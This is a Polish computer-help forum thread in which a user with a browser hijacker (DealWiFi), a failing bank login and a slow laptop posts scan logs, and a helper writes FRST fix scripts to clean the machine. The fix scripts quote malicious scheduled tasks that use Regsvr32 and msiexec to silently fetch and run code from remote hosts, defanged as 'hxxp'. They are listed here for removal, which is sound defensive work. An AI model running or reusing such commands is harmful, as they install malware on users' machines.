DealWiFi - problem

[mateo33]

Witam, 

nie było mnie kilka dni w domu, podczas którego moja mama użytkowała mojego laptopa. 

Po powrocie czekało mnie kilka niespodzianek: 

1. Jako wyszukiwarkę mam ustawioną domyślnie "DealWiFi "
2. Nie mogę zalogować się na konto bankowe - proces logowania ładuje się w nieskończoność (na drugim komputerze działa bez zarzutu)
3. Tną mi się gry, które wcześniej działały bez problemu. 

Przeskanowałem komputer ComboFix. 
Wyniki:  http://wklej.org/id/3096991/

Bardzo proszę o poradę co może się dziać...

[broda99]

Cytat:Przeskanowałem komputer ComboFix.

Brawo .

Przedstaw komplet logów: http://forum.pcformat.pl/Problem-z-rekla...owe-logi-t .

[mateo33]

Po przeskanowaniu niżej wymienionymi programami odinstalowało mi się DealWiFi

Jednak w dalszym ciągu:

1. Nie mogę zalogować się na konto bankowe z Chrome

2. Nawet najprostsze gry bardzo mi tną

ComboFix: http://wklej.org/id/3097592/

AdwCleaner: http://wklej.org/id/3097594/

Przy FRST wyskoczyły mi 3 logi:
- FRST: http://wklej.org/id/3097601/
- Addition: http://wklej.org/id/3097603/
- Shortcut: http://wklej.org/id/3097604/

EDIT:

Przed chwilą wywaliło mnie w Chrome, a samoistnie zainstalował mi się Firefox... W Panelu sterowania jak i CClineanerze nie widnieje i nie mogę go odinstalować...

Ad. Przeskanowałem jeszcze raz AdwCleaner, wykryło mi 28 zagrożeń: http://wklej.org/id/3097635/

[broda99]

Gdzie ja napisałem że masz użyć ComboFix?? Poczytaj: https://forum.pcformat.pl/WAZNE-Jak-zalo...ec-WAZNE-t , szczególnie p.6.

Do Notatnika wklej (bez frazy "Kod:"):

Kod:

Task: {1F2FE6BB-DB8C-474F-867C-83FE3B21CC2E} - System32\Tasks\PowerWord-SCT-JT => Regsvr32.exe /s /i:hxxp://point.lbyhbyc.com/?data=zDlkMj1YFUNWRWRYNjRSMUU5FdU1NdzSFTYxN8FcNkJSNTVWRH== scrobj.dll
Task: {E2642FC1-B4ED-4ECE-9B1C-574B031367A4} - System32\Tasks\Windows-WoShiBeiYongDe => Regsvr32.exe /s /i:hxxp://u76wtn6.x.incapdns.net/?data=zDlkMj1YFUNWRWRYNjRSMUU5FdU1NdzSFTYxN8FcNkJSNTVWRH== scrobj.dll
HKLM\SOFTWARE\Policies\Microsoft\Internet Explorer: Ograniczenia <======= UWAGA
HKU\S-1-5-21-629254379-1472506870-1867118468-1000\SOFTWARE\Policies\Microsoft\Internet Explorer: Ograniczenia <======= UWAGA
Toolbar: HKU\S-1-5-21-629254379-1472506870-1867118468-1000 -> Brak nazwy - {4BAAC1B8-0800-42C9-8FA6-08B211F356B8} -  Brak pliku
S3 catchme; \??\C:\ComboFix\catchme.sys [X]
EmptyTemp:

Skrypt unikatowy - proszę nie stosować do "takich samych" przypadków.

Plik > Zapisz jako: fixlist.txt w katalogu w którym jest FRST.exe. Uruchom FRST: Napraw > w tym samym katalogu powstanie log wynikowy: fixlog.txt. Potwierdź restart kompa.
Uwaga: narzędzie usunie wszystkie pliki tymczasowe.

Zamknij wszystkie przeglądarki, uruchom AdwCleaner > Skanuj > Oczyść > restart.
Pokaż log AdwCleaner + fixlog.txt + nowe logi FRST.

[mateo33]

AdwCleaner: http://wklej.org/id/3097746/

fixlog.txt: http://wklej.org/id/3097729/

FRST: http://wklej.org/id/3097732/
Addition: http://wklej.org/id/3097734/
Shortcut: http://wklej.org/id/3097735/

[broda99]

Wszystko pochrzaniłeś:
1. Plik fixlist.txt był pusty.
2. AdwCleaner miał wykonać opcję Oczyść - czyli po uruchomieniu: Skanuj > Oczyść.

Wykonaj jeszcze raz po kolei wszystkie czynności.

[mateo33]

AdwCleaner: http://wklej.org/id/3097767/

Fixlog: http://wklej.org/id/3097768/

FRST: http://wklej.org/id/3097773/
Addition: http://wklej.org/id/3097775/
Shortcut: http://wklej.org/id/3097776/

[broda99]

Odinstaluj ComboFix: Start > w polu wyszukiwania wpisz: combofix /uninstall [Enter]
( https://www.bleepingcomputer.com/combofi...a-combofix ).

Cały czas siedzi w systemie jakieś świństwo. Do Notatnika wklej (bez frazy "Kod:"):

Kod:

Task: {650D784A-759B-4F62-879C-562CA371DC07} - System32\Tasks\T0528 => msiexec.exe /i hxxp://point.chcyhqc.com/anzhaungoimism3.dat /q
HKU\S-1-5-18\Control Panel\Desktop\\SCRNSAVE.EXE ->
R2 3DM; C:\Users\Medion\AppData\Local\3DM\Kitty.dll [754688 2017-04-18] (kitty.exe) [Brak podpisu cyfrowego]
C:\Users\Medion\AppData\Local\3DM
C:\Users\Medion\AppData\Roaming\SSMgre
C:\Users\Public\Documents\temp.dat
C:\Program Files (x86)\BiaoJi
C:\Windows\system32\log
emptytemp:

Skrypt unikatowy - proszę nie stosować do "takich samych" przypadków.

Plik > Zapisz jako: fixlist.txt w katalogu w którym jest FRST.exe. Uruchom FRST: Napraw > w tym samym katalogu powstanie log wynikowy: fixlog.txt. Potwierdź restart kompa.

Pokaż + fixlog.txt + nowe logi FRST.

[mateo33]

Fixlog: http://wklej.org/id/3097886/

FRST: http://wklej.org/id/3097891/
Addition: http://wklej.org/id/3097893/
Shourtcut: http://wklej.org/id/3097895/

[broda99]

Jeszcze poprawka: Do Notatnika wklej (bez frazy "Kod:"):

Kod:

C:\Windows\SysWOW64\33
C:\Windows\SysWOW64\11
C:\Qoobox
folder: C:\Program Files (x86)\Everness
folder: "C:\Program Files (x86)\Everness"

Skrypt unikatowy - proszę nie stosować do "takich samych" przypadków.

Plik > Zapisz jako: fixlist.txt w katalogu w którym jest FRST.exe. Uruchom FRST: Napraw > w tym samym katalogu powstanie log wynikowy: fixlog.txt. Pokaż fixlog.txt.

Jak się zachowuje system?